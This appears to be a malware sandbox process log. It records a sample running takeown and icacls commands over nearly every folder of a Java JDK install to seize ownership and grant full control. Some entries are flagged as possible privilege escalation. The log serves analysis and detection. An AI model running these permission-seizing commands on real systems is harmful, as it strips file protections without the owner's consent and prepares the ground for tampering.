C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\bin" /a2⤵PID:2356
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\bin" /grant Administrators:F2⤵PID:1636
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\bin\appletviewer.exe" /a2⤵PID:1540
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\bin\appletviewer.exe" /grant Administrators:F2⤵PID:1824
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\db" /a2⤵PID:2376
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\db" /grant Administrators:F2⤵PID:2864
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\db\bin" /a2⤵PID:1692
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\db\bin" /grant Administrators:F2⤵PID:3068
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\db\lib" /a2⤵PID:356
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\db\lib" /grant Administrators:F2⤵PID:2192
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\include" /a2⤵PID:984
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\include" /grant Administrators:F2⤵PID:1876
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\include\win32" /a2⤵PID:3032
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\include\win32" /grant Administrators:F2⤵PID:1588
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\include\win32\bridge" /a2⤵PID:928
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\include\win32\bridge" /grant Administrators:F2⤵PID:1448
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\jre" /a2⤵PID:1992
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\jre" /grant Administrators:F2⤵PID:2364
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\jre\bin" /a2⤵PID:316
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\jre\bin" /grant Administrators:F2⤵PID:2028
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\jre\bin\jabswitch.exe" /a2⤵PID:692
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\jre\bin\jabswitch.exe" /grant Administrators:F2⤵PID:2776
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\jre\bin\dtplugin" /a2⤵PID:1412
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\jre\bin\dtplugin" /grant Administrators:F2⤵PID:1216
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\jre\bin\plugin2" /a2⤵PID:2744
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\jre\bin\plugin2" /grant Administrators:F2⤵PID:448
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server" /a2⤵PID:2616
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server" /grant Administrators:F2⤵PID:2112
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\jre\lib" /a2⤵PID:2336
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\jre\lib" /grant Administrators:F2⤵PID:2536
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\jre\lib\launcher.exe" /a2⤵PID:2132
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\jre\lib\launcher.exe" /grant Administrators:F2⤵PID:2064
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\jre\lib\amd64" /a2⤵PID:2160
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\jre\lib\amd64" /grant Administrators:F2⤵PID:1488
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\jre\lib\applet" /a2⤵PID:2800
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\jre\lib\applet" /grant Administrators:F2⤵PID:296
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\jre\lib\cmm" /a2⤵PID:2388
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\jre\lib\cmm" /grant Administrators:F2⤵PID:1880
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy" /a2⤵PID:1292
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy" /grant Administrators:F2⤵PID:644
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext" /a2⤵
- Possible privilege escalation attempt
PID:1388
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext" /grant Administrators:F2⤵PID:2980
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts" /a2⤵PID:948
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts" /grant Administrators:F2⤵PID:2704
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\jre\lib\images" /a2⤵PID:2636
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\jre\lib\images" /grant Administrators:F2⤵PID:1688
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors" /a2⤵PID:1492
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors" /grant Administrators:F2⤵
- Possible privilege escalation attempt
PID:2516
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\jre\lib\jfr" /a2⤵PID:2652
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\jre\lib\jfr" /grant Administrators:F2⤵PID:3068
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\jre\lib\management" /a2⤵PID:2412
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\jre\lib\management" /grant Administrators:F2⤵PID:2116
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\jre\lib\security" /a2⤵PID:752
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\jre\lib\security" /grant Administrators:F2⤵PID:1472
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi" /a2⤵PID:2796
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi" /grant Administrators:F2⤵PID:2000
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa" /a2⤵
- Possible privilege escalation attempt
PID:2596
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa" /grant Administrators:F2⤵
- Modifies file permissions
PID:1632
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America" /a2⤵PID:2180
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America" /grant Administrators:F2⤵PID:1944
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina" /a2⤵
- Possible privilege escalation attempt
PID:1532
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina" /grant Administrators:F2⤵PID:3012
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Indiana" /a2⤵
- Possible privilege escalation attempt
PID:600
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Indiana" /grant Administrators:F2⤵PID:2328
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Kentucky" /a2⤵PID:332
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Kentucky" /grant Administrators:F2⤵
- Possible privilege escalation attempt
PID:2184
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\North_Dakota" /a2⤵PID:2432
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\North_Dakota" /grant Administrators:F2⤵PID:2548
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica" /a2⤵PID:1412
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica" /grant Administrators:F2⤵PID:1624
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia" /a2⤵PID:2464
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia" /grant Administrators:F2⤵PID:2536
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic" /a2⤵PID:2608
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic" /grant Administrators:F2⤵
- Modifies file permissions
PID:2900
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia" /a2⤵PID:696
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia" /grant Administrators:F2⤵PID:1612
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc" /a2⤵PID:1168
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc" /grant Administrators:F2⤵PID:2724
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe" /a2⤵PID:2132
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe" /grant Administrators:F2⤵PID:992
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Indian" /a2⤵PID:1972
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Indian" /grant Administrators:F2⤵PID:2016
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific" /a2⤵PID:2856
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific" /grant Administrators:F2⤵PID:1852
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV" /a2⤵PID:2660
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV" /grant Administrators:F2⤵PID:2372
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib" /a2⤵PID:2440
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib" /grant Administrators:F2⤵PID:2704
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol" /a2⤵PID:1404
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol" /grant Administrators:F2⤵PID:2188
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration" /a2⤵PID:1460
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration" /grant Administrators:F2⤵PID:2652
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\org.eclipse.equinox.simpleconfigurator" /a2⤵
- Modifies file permissions
PID:1952
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\org.eclipse.equinox.simpleconfigurator" /grant Administrators:F2⤵
- Modifies file permissions
PID:1188
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\org.eclipse.update" /a2⤵PID:2284
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\org.eclipse.update" /grant Administrators:F2⤵PID:1884
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\dropins" /a2⤵PID:2256
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\dropins" /grant Administrators:F2⤵PID:756
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features" /a2⤵PID:2000
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features" /grant Administrators:F2⤵PID:1456
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.console_5.5.0.165303" /a2⤵PID:2484
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.console_5.5.0.165303" /grant Administrators:F2⤵PID:2012
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.core_5.5.0.165303" /a2⤵PID:888
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.core_5.5.0.165303" /grant Administrators:F2⤵PID:2180
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.flightrecorder_5.5.0.165303" /a2⤵PID:2572
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.flightrecorder_5.5.0.165303" /grant Administrators:F2⤵PID:2368
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.ja_5.5.0.165303" /a2⤵PID:2332
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.ja_5.5.0.165303" /grant Administrators:F2⤵PID:2444
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.zh_CN_5.5.0.165303" /a2⤵PID:760
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.zh_CN_5.5.0.165303" /grant Administrators:F2⤵PID:972
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp_5.5.0.165303" /a2⤵PID:2432
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp_5.5.0.165303" /grant Administrators:F2⤵PID:2920
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.rcp.product_5.5.0.165303" /a2⤵PID:2672
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.rcp.product_5.5.0.165303" /grant Administrators:F2⤵PID:2400
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002" /a2⤵PID:2900
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002" /grant Administrators:F2⤵PID:1912
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002" /a2⤵PID:2452
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002" /grant Administrators:F2⤵PID:780
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033" /a2⤵PID:208
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033" /grant Administrators:F2⤵PID:2160
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\META-INF" /a2⤵PID:2600
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\META-INF" /grant Administrators:F2⤵PID:1916
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444" /a2⤵PID:992
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444" /grant Administrators:F2⤵PID:228
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\META-INF" /a2⤵
- Possible privilege escalation attempt
PID:2832
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\META-INF" /grant Administrators:F2⤵PID:1572
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444" /a2⤵
- Possible privilege escalation attempt
PID:2372
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444" /grant Administrators:F2⤵PID:1688
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\META-INF" /a2⤵PID:2980
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\META-INF" /grant Administrators:F2⤵
- Possible privilege escalation attempt
PID:1568
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444" /a2⤵PID:900
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444" /grant Administrators:F2⤵PID:1824
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\META-INF" /a2⤵PID:2236
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\META-INF" /grant Administrators:F2⤵PID:2412
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444" /a2⤵
- Modifies file permissions
PID:1952
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444" /grant Administrators:F2⤵PID:2956
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\META-INF" /a2⤵PID:1552
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\META-INF" /grant Administrators:F2⤵PID:2052
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444" /a2⤵PID:756
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444" /grant Administrators:F2⤵PID:2596
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\META-INF" /a2⤵PID:2448
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\META-INF" /grant Administrators:F2⤵PID:2612
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444" /a2⤵PID:2568
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444" /grant Administrators:F2⤵PID:496
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\META-INF" /a2⤵PID:2528
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\META-INF" /grant Administrators:F2⤵PID:2708
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043" /a2⤵PID:2484
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043" /grant Administrators:F2⤵PID:1700
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\META-INF" /a2⤵PID:2112
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\META-INF" /grant Administrators:F2⤵PID:896
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043" /a2⤵PID:2096
-
-
